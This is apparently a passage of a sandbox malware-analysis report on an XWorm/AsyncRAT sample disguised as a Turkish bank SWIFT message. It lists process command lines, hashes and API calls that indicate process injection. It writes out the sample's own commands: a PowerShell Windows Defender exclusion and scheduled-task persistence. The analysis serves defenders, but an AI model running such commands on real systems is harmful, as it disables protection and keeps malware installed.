Commandline:	C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe
Imagebase:	0x330000
File size:	840'704 bytes
MD5 hash:	7C36F1554BB662ABDDB2FAFB5DB3037D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:01:14
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YkxAHNcqEmoeLS" /XML "C:\Users\user\AppData\Local\Temp\tmp9D06.tmp"
Imagebase:	0x980000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:01:14
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:01:15
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\YkxAHNcqEmoeLS.exe"
Imagebase:	0x600000
File size:	840'704 bytes
MD5 hash:	7C36F1554BB662ABDDB2FAFB5DB3037D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000E.00000002.2503972444.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	03:01:15
Start date:	26/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 1016
Imagebase:	0x8b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	03:01:27
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0x8e0000
File size:	41'472 bytes
MD5 hash:	1C5CF825E29B63A62C3C8B1589D51A1E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	03:01:29
Start date:	26/11/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	03:01:29
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	03:01:30
Start date:	26/11/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:07 /du 23:59 /sc daily /ri 1 /f
Imagebase:	0x7ff6b6b80000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	03:01:30
Start date:	26/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	03:01:35
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\XClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\XClient.exe"
Imagebase:	0x3c0000
File size:	41'472 bytes
MD5 hash:	1C5CF825E29B63A62C3C8B1589D51A1E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	03:02:03
Start date:	26/11/2024
Path:	C:\Users\user\AppData\Roaming\ACCApi\apihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Imagebase:	0x760000
File size:	665'641'472 bytes
MD5 hash:	323EA75CFDE79456B79629AD4F7D8578
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000001B.00000002.4577783321.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	217
Total number of Limit Nodes:	10

Executed Functions

Function 0AF71030 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2150166868.000000000AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af70000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c7d15f694ff3740bdf56b9d8641513f5a72c28accc21558d987e816a8f0d7f6
Instruction ID: 2f9bf3d1291b4c59722897730e6dec4395835094c844d4495af4188164e84b95
Opcode Fuzzy Hash: 8c7d15f694ff3740bdf56b9d8641513f5a72c28accc21558d987e816a8f0d7f6
Instruction Fuzzy Hash: B6329A70B113049FDB28DB69C554BAEBBF6AF89300F24456AE506AB3A1CF35EC05CB50

Function 0712F49C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 026731c8ed318209f321569ca07219b49520d5e3a1ce538176f6cb8444f6a22c
Instruction ID: 0cf7d74ee68dcefc804fe6cc547ccfd7d0bd079737077dde8654d32560d51239
Opcode Fuzzy Hash: 026731c8ed318209f321569ca07219b49520d5e3a1ce538176f6cb8444f6a22c
Instruction Fuzzy Hash: 11C04C9699E028D1890C189460110F8A37CC68B126F463061C60DA24918B1042376199

Function 0712BE5C Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0712C09E

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 47d81aa67f15320f03b48c196c9681465b91760eb998a8936d246627f8a8b4cb
Instruction ID: 444446d85312544ca1853afc0f261347ee5c468f4a0c733676e969c81863727a
Opcode Fuzzy Hash: 47d81aa67f15320f03b48c196c9681465b91760eb998a8936d246627f8a8b4cb
Instruction Fuzzy Hash: 42A192B1D0022ADFDF25CF68C8517EDBBB2BF44314F14816AD808A7280E7749996DF91

Function 0712BE68 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0712C09E

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ce05b4643a61713d2127755b88dfb8e73fc39fc59533ca410f96f45d23e3fa17
Instruction ID: 876462f333a12e0bd23460b06c3c4e884663b3000abdc97bd29b1fd159e57cc3
Opcode Fuzzy Hash: ce05b4643a61713d2127755b88dfb8e73fc39fc59533ca410f96f45d23e3fa17
Instruction Fuzzy Hash: 47918FB1D0022ADFDF25DF68C8517EDBBB2BF44314F1481A9D808A7280EB749996DF91

Function 0127AD88 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0127AFDE

Memory Dump Source

Source File: 00000000.00000002.2142273946.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1270000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f901f6b7d49512bd79064cc507fd38ae8a8b1074fbdfd227b426880d09992306
Instruction ID: 94bef3c437d69a039029650396754038c211afa05fe4f8bf7ed82fba0ad6928b
Opcode Fuzzy Hash: f901f6b7d49512bd79064cc507fd38ae8a8b1074fbdfd227b426880d09992306
Instruction Fuzzy Hash: FE714370A10B068FD724DF29D04475BBBF5BF88314F048A2ED68AD7A40DB34E949CB90

Function 012744B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012759C9

Memory Dump Source

Source File: 00000000.00000002.2142273946.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1270000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 178df1aa30a22d7fb484bc33baa04a826359d43741023ba9a040c78822e0ccb9
Instruction ID: 7bbe60739fde4166a52da8fc6c7b476d91141faa1aa663210c4188a87e0a02b3
Opcode Fuzzy Hash: 178df1aa30a22d7fb484bc33baa04a826359d43741023ba9a040c78822e0ccb9
Instruction Fuzzy Hash: 8441F1B0C0071DCBDB24DFA9C884B9EFBB5BF49704F20806AD508AB251DB75694ACF90

Function 0127590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 012759C9

Memory Dump Source

Source File: 00000000.00000002.2142273946.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1270000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d4def4218486fea693d2f489758e3d63b7570b1ee0d1875d430fb7c33776ccee
Instruction ID: f1df3c5d50319fac410585547cb726392b3aaac32330663f7deb14e3dd7ca500
Opcode Fuzzy Hash: d4def4218486fea693d2f489758e3d63b7570b1ee0d1875d430fb7c33776ccee
Instruction Fuzzy Hash: 8E41F3B0C00719CEDB24DFA9C884BDEFBB2BF49704F20806AD508AB254DB75694ACF50

Function 0712BBD8 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0712BC70

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: eed42cdb65ab0f297222036b25fcf5871fad1d9059ba11661d4e6d5cb0889cc2
Instruction ID: 7609cec24bd2108fa0c2950e1ed63e47eaa644b210b62477e5817347d61d19b7
Opcode Fuzzy Hash: eed42cdb65ab0f297222036b25fcf5871fad1d9059ba11661d4e6d5cb0889cc2
Instruction Fuzzy Hash: 4E2148B59003199FCB10DFA9C885BEEBFF5FF48310F10842AE918A7250DB789551DBA5

Function 0712BCC9 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0712BD50

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 213e7f1d4fc113633dd8ebcf8ed5bd542bf7c51e47d24be913da32d0356a11ab
Instruction ID: 7a181ecedbdf24db677571c40e233b3e848797ec97c374f3be3c0acc33f4691e
Opcode Fuzzy Hash: 213e7f1d4fc113633dd8ebcf8ed5bd542bf7c51e47d24be913da32d0356a11ab
Instruction Fuzzy Hash: 63213BB5C003599FCB10DFAAD881AEEFBF5FF48310F50842AE518A7251D7389545DBA1

Function 0712BBE0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0712BC70

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 147054846f8129f6fd1633cc61bf67896b7df6b196fbd97cdbfde32f4cbd6ff5
Instruction ID: 4133d8ce104d374098ab04e391b958c860562571dee9dc68c4daa6b643ad5d5b
Opcode Fuzzy Hash: 147054846f8129f6fd1633cc61bf67896b7df6b196fbd97cdbfde32f4cbd6ff5
Instruction Fuzzy Hash: 422169B1D003199FCB10DFA9C881BEEBBF5FF48310F108429E918A7250DB789951DBA0

Function 0712B609 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0712B68E

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9f8bb93bc93306224834dadc1f2a6fbed692e0b0dd625bbc312cfa8de2b3e26b
Instruction ID: 1bf1158d803b4ec2d9490ca1c92c49faeee5c86269d82b600315f4beb57bd462
Opcode Fuzzy Hash: 9f8bb93bc93306224834dadc1f2a6fbed692e0b0dd625bbc312cfa8de2b3e26b
Instruction Fuzzy Hash: 792157B1D002199FDB10DFAAC485BEEBBF4EF48314F14842AD919A7240DB789985CFA4

Function 0127B770 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0127D626,?,?,?,?,?), ref: 0127D6E7

Memory Dump Source

Source File: 00000000.00000002.2142273946.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1270000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 928daa9e8b010b5ffba93196867fa95937dd233b39aa833559eeca9c5aa8dcd6
Instruction ID: 834faa67d07690f1b0cff8db54818fd881cfcbbc27227356e41f376c1448ca96
Opcode Fuzzy Hash: 928daa9e8b010b5ffba93196867fa95937dd233b39aa833559eeca9c5aa8dcd6
Instruction Fuzzy Hash: 3721D4B590024D9FDB10CF9AD584ADEBBF4EF48310F14841AE918A3310D378A940CFA5

Function 0712BB18 Relevance: 1.6, APIs: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0712BB8E

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 678851b7bcd1fe1e184b7c2aba1b08a8e8e3614dd3611cd2162530ffcf54278f
Instruction ID: 21a074d22598a5f39f14b4d653553caf035ba0a4aa2ed47ded24960c6dd10df7
Opcode Fuzzy Hash: 678851b7bcd1fe1e184b7c2aba1b08a8e8e3614dd3611cd2162530ffcf54278f
Instruction Fuzzy Hash: 8121ACB6C002589FCB20DFAAD805BEEBFF5EF48320F14841AE919A7250C7399545CFA5

Function 0127D658 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0127D626,?,?,?,?,?), ref: 0127D6E7

Memory Dump Source

Source File: 00000000.00000002.2142273946.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1270000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6d9f32d4f75cd581090225a7f97b5e13f2fe6c5146c1e48a24cd43aeb2a4acc3
Instruction ID: 906491ead255b9eeb1c74edda4f711bf8ac8582fcc007328a5d2ab45a2ece45d
Opcode Fuzzy Hash: 6d9f32d4f75cd581090225a7f97b5e13f2fe6c5146c1e48a24cd43aeb2a4acc3
Instruction Fuzzy Hash: B221D2B59002599FDB10CFAAD984ADEBFF9FB48310F14841AE918A3250D778A940CFA4

Function 0712B610 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0712B68E

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: b2b0f87d32282648132c7cae0ac3031189c8207d2ce8777c6b84fadd66195d0c
Instruction ID: ad44aca32551958e2b05b611663768e82607267bb9d2716cab370837a0dc075c
Opcode Fuzzy Hash: b2b0f87d32282648132c7cae0ac3031189c8207d2ce8777c6b84fadd66195d0c
Instruction Fuzzy Hash: 812115B1D002198FDB10DFAAC585BEEBBF4EF48314F14842AD919A7240DB78A945CFA5

Function 0712BCD0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0712BD50

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: d0dfdeb7428c6828204d7f2499c80c38e390cf54395eb6b99b78b4a4608778be
Instruction ID: 05d3c3bae7b4b4d83f285dca2edae117dde1dea421fe7923a2f7b1adfddc7093
Opcode Fuzzy Hash: d0dfdeb7428c6828204d7f2499c80c38e390cf54395eb6b99b78b4a4608778be
Instruction Fuzzy Hash: 6D2137B1C003599FCB10DFAAC880AEEFBF5FF48310F50842AE919A7250D7389945DBA0

Function 0712B558 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0712B5C2

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 08951f27741e282d92e009c6061134cff264049b8a53ed123019a876e1b6351e
Instruction ID: 1d00cfa7f103a9af149d30bc85981d8703df1262e8a9ee1a987de07bbfe50bec
Opcode Fuzzy Hash: 08951f27741e282d92e009c6061134cff264049b8a53ed123019a876e1b6351e
Instruction Fuzzy Hash: 8A115BB5C002598BCB20DFAAC8457EEFFF5EF48314F148419D519A7240CB39A941CFA4

Function 0712BB20 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0712BB8E

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5f43608089485c8262ec47db71be29a58182485fd93df555baf6b19f34d093b3
Instruction ID: 1e054e2df88a9b5651759a0f5f34aab9350be743c43fbd23ba39605ff68a7401
Opcode Fuzzy Hash: 5f43608089485c8262ec47db71be29a58182485fd93df555baf6b19f34d093b3
Instruction Fuzzy Hash: 991137B1C002599FCB20DFAAC844AEEFFF5EF48310F148819E919A7250CB79A551CFA4

Function 0712B560 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0712B5C2

Memory Dump Source

Source File: 00000000.00000002.2148455052.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7120000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 29e54aae7bddbf224a6966c8e7d760a03e461f3cbac61d9a2cc1b37d9d26ce82
Instruction ID: 8c3e53e2af85b802cada1e5cf6f35b3bfecded4b7ffb24d2efa0ec27113190e8
Opcode Fuzzy Hash: 29e54aae7bddbf224a6966c8e7d760a03e461f3cbac61d9a2cc1b37d9d26ce82
Instruction Fuzzy Hash: 721166B1C002598FCB20DFAAC4447EEFBF5EF88320F208819C519A7240CB38A941CFA0

Function 0AF702B8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0AF7031D

Memory Dump Source

Source File: 00000000.00000002.2150166868.000000000AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af70000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9f1bdb945bd86ae46228183cd4c3795e99cfc49ee8765f51a850941d1193f439
Instruction ID: 96ae78ddb3f1f2970fd831ee4eb762c3ad17e648df22319ca3a9d453df712e3f
Opcode Fuzzy Hash: 9f1bdb945bd86ae46228183cd4c3795e99cfc49ee8765f51a850941d1193f439
Instruction Fuzzy Hash: BE11E3B5800349DFDB10DF9AD485BDEBBF8EB48320F10845AE918A7600C779A584CFA5

Function 0127AF78 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0127AFDE

Memory Dump Source

Source File: 00000000.00000002.2142273946.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1270000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f21189302af1136356a2aa48d16751197d0153389e3b540525bcd39129c3f56b
Instruction ID: 8bde748169a03a923468b108bcad52e4818dc3e1eb70915ceeed4cff7aff45a8
Opcode Fuzzy Hash: f21189302af1136356a2aa48d16751197d0153389e3b540525bcd39129c3f56b
Instruction Fuzzy Hash: FC11E0B5C002498FDB10DF9AC444ADEFBF4EF88324F14845AD929A7650C379A545CFA5

Function 0AF702C0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0AF7031D

Memory Dump Source

Source File: 00000000.00000002.2150166868.000000000AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AF70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_af70000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 64525e943afb252dcc2cd177dc02318c289af3ed8283dffea440416dedd2bcc2
Instruction ID: 05f3e2ee42cb61b193f3035bb09bf25fcaf12d973f84a70bd0f54db98e3c3e7b
Opcode Fuzzy Hash: 64525e943afb252dcc2cd177dc02318c289af3ed8283dffea440416dedd2bcc2
Instruction Fuzzy Hash: 4C11D3B58003499FDB10DF9AD485BDEFBF8EB48310F10845AD958A7200C779A644CFA5

Function 011FD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2138210152.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_11fd000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a05292bacc22acec198ae3d93c4d81732d67c2c31ef54aafbe9ba8607adf3ead
Instruction ID: a46b18b080e4901cb0eff5f29f1647dc6de4d5f417902fa13395682422ef8c7e
Opcode Fuzzy Hash: a05292bacc22acec198ae3d93c4d81732d67c2c31ef54aafbe9ba8607adf3ead
Instruction Fuzzy Hash: 4D2136B1100204DFDF09DF58E9C0B66BF65FB88314F20C16DDA090B656C33AE406C7A2

Function 0120D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140748384.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_120d000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e6fbe903511ab2f0a3bce26b1ee320c7bd5ee4b826ddfc6707cdc78b148b94c
Instruction ID: 33a975901aedc4e3aaddf9250fc84608b18b6b754951d6c54f0b47819f41b018
Opcode Fuzzy Hash: 2e6fbe903511ab2f0a3bce26b1ee320c7bd5ee4b826ddfc6707cdc78b148b94c
Instruction Fuzzy Hash: D621F571555208EFDB06DFE8D5C0B26BB65FB84324F20C66DE9094B297C37AD406CA61

Function 0120D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2140748384.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

